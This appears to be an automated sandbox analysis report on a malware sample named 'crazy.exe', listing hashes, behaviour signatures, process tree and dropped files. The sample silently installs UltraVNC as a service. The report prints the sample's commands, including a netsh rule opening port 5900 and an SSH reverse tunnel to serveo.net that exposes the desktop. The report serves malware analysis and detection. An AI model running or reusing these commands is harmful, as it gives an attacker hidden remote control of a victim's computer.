Analysis
-
max time kernel
150s -
max time network
20s -
platform
windows7_x64 -
resource
win7 -
submitted
24-06-2020 13:40
Static task
static1
Behavioral task
behavioral1
Sample
crazy.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
crazy.exe
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
crazy.exe
-
Size
5.2MB
-
MD5
5681f1da959eb80af6735166b1e71cdb
-
SHA1
74036e08dea67fbbee5d81e07fb24408fe4305fe
-
SHA256
69cd9793d80b5e5d7f5bf377822dc573c84ef939ede4eedd892fd1b757435bff
-
SHA512
d175f8adc5f6ac0e1a616bf24f1c3d884ca02e9f057e15ede43297ef0472a80a286ae032acaeedf9a6d87449fb6abe020fcdcb549f79429266919717f711f82d
Score
8/10
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
Processes:
winvnc.exewinvnc.exetest1.exetest1.exewinvnc.exepid process 324 winvnc.exe 1776 winvnc.exe 1876 test1.exe 1892 test1.exe 1808 winvnc.exe -
Suspicious use of SendNotifyMessage 29 IoCs
Processes:
winvnc.exepid process 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe -
Drops file in Windows directory 10 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\vnc\Install.bat cmd.exe File created C:\Windows\vnc\test1.exe cmd.exe File created C:\Windows\vnc\ultravnc.ini cmd.exe File opened for modification C:\Windows\vnc\ultravnc.ini cmd.exe File opened for modification C:\Windows\vnc\vnchooks.dll cmd.exe File created C:\Windows\vnc\Install.bat cmd.exe File created C:\Windows\vnc\vnchooks.dll cmd.exe File created C:\Windows\vnc\winvnc.exe cmd.exe File opened for modification C:\Windows\vnc\winvnc.exe cmd.exe File opened for modification C:\Windows\vnc\test1.exe cmd.exe -
Runs net.exe
-
Modifies Windows Firewall 1 TTPs
-
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
crazy.execmd.exewinvnc.exenet.exetest1.exetest1.exewinvnc.exedescription pid process target process PID 1544 wrote to memory of 892 1544 crazy.exe cmd.exe PID 1544 wrote to memory of 892 1544 crazy.exe cmd.exe PID 1544 wrote to memory of 892 1544 crazy.exe cmd.exe PID 1544 wrote to memory of 892 1544 crazy.exe cmd.exe PID 1544 wrote to memory of 892 1544 crazy.exe cmd.exe PID 1544 wrote to memory of 892 1544 crazy.exe cmd.exe PID 1544 wrote to memory of 892 1544 crazy.exe cmd.exe PID 892 wrote to memory of 324 892 cmd.exe winvnc.exe PID 892 wrote to memory of 324 892 cmd.exe winvnc.exe PID 892 wrote to memory of 324 892 cmd.exe winvnc.exe PID 892 wrote to memory of 324 892 cmd.exe winvnc.exe PID 324 wrote to memory of 1036 324 winvnc.exe net.exe PID 324 wrote to memory of 1036 324 winvnc.exe net.exe PID 324 wrote to memory of 1036 324 winvnc.exe net.exe PID 892 wrote to memory of 1504 892 cmd.exe netsh.exe PID 892 wrote to memory of 1504 892 cmd.exe netsh.exe PID 892 wrote to memory of 1504 892 cmd.exe netsh.exe PID 892 wrote to memory of 1504 892 cmd.exe netsh.exe PID 1036 wrote to memory of 1692 1036 net.exe net1.exe PID 1036 wrote to memory of 1692 1036 net.exe net1.exe PID 1036 wrote to memory of 1692 1036 net.exe net1.exe PID 892 wrote to memory of 1876 892 cmd.exe test1.exe PID 892 wrote to memory of 1876 892 cmd.exe test1.exe PID 892 wrote to memory of 1876 892 cmd.exe test1.exe PID 892 wrote to memory of 1876 892 cmd.exe test1.exe PID 1876 wrote to memory of 1892 1876 test1.exe test1.exe PID 1876 wrote to memory of 1892 1876 test1.exe test1.exe PID 1876 wrote to memory of 1892 1876 test1.exe test1.exe PID 1892 wrote to memory of 1916 1892 test1.exe cmd.exe PID 1892 wrote to memory of 1916 1892 test1.exe cmd.exe PID 1892 wrote to memory of 1916 1892 test1.exe cmd.exe PID 1776 wrote to memory of 1808 1776 winvnc.exe winvnc.exe PID 1776 wrote to memory of 1808 1776 winvnc.exe winvnc.exe PID 1776 wrote to memory of 1808 1776 winvnc.exe winvnc.exe -
Loads dropped DLL 8 IoCs
Processes:
cmd.exetest1.exetest1.exepid process 892 cmd.exe 892 cmd.exe 892 cmd.exe 1876 test1.exe 1892 test1.exe 1892 test1.exe 1892 test1.exe 1892 test1.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
winvnc.exedescription pid process Token: SeTcbPrivilege 1776 winvnc.exe -
Suspicious behavior: EnumeratesProcesses 89 IoCs
Processes:
winvnc.exewinvnc.exepid process 1776 winvnc.exe 1776 winvnc.exe 1776 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
Processes:
winvnc.exepid process 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe 1808 winvnc.exe -
Modifies service 2 TTPs 7 IoCs
Processes:
netsh.exewinvnc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\uvnc_service winvnc.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\uvnc_service\Description = "Provides secure remote desktop sharing" winvnc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\crazy.exe"C:\Users\Admin\AppData\Local\Temp\crazy.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\463.tmp\Install.bat" "2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
-
C:\Windows\vnc\winvnc.exeC:\Windows\vnc\winvnc -install3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Modifies service
-
C:\Windows\system32\net.exenet start "uvnc_service"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start "uvnc_service"5⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=59003⤵
- Modifies service
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exetest1.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exetest1.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ssh -o "StrictHostKeyChecking=no" -R itisme:5800:10.7.0.10:5900 serveo.net"5⤵
-
C:\Windows\vnc\winvnc.exe"C:\Windows\vnc\winvnc.exe" -service1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\vnc\winvnc.exeC:\Windows\vnc\winvnc.exe -service_run2⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\Install.bat
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\ultravnc.ini
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\vnchooks.dll
-
C:\Users\Admin\AppData\Local\Temp\463.tmp\winvnc.exe
-
C:\Users\Admin\AppData\Local\Temp\_MEI18762\MSVCR90.dll
-
C:\Users\Admin\AppData\Local\Temp\_MEI18762\python27.dll
-
C:\Users\Admin\AppData\Local\Temp\_MEI18762\test1.exe.manifest
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_socket.pyd
-
C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_ssl.pyd
-
C:\Windows\vnc\UltraVNC.ini
-
C:\Windows\vnc\winvnc.exe
-
C:\Windows\vnc\winvnc.exe
-
C:\Windows\vnc\winvnc.exe
-
\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
-
\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
-
\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
-
\Users\Admin\AppData\Local\Temp\_MEI18762\msvcr90.dll
-
\Users\Admin\AppData\Local\Temp\_MEI18762\python27.dll
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\_socket.pyd
-
\Users\Admin\AppData\Local\Temp\_MEI18~1\_ssl.pyd
-
\Windows\vnc\winvnc.exe
-
memory/324-7-0x0000000000000000-mapping.dmp
-
memory/892-0-0x0000000000000000-mapping.dmp
-
memory/1036-10-0x0000000000000000-mapping.dmp
-
memory/1504-11-0x0000000000000000-mapping.dmp
-
memory/1692-12-0x0000000000000000-mapping.dmp
-
memory/1808-31-0x0000000000000000-mapping.dmp
-
memory/1876-16-0x0000000000000000-mapping.dmp
-
memory/1892-19-0x0000000000000000-mapping.dmp
-
memory/1916-30-0x0000000000000000-mapping.dmp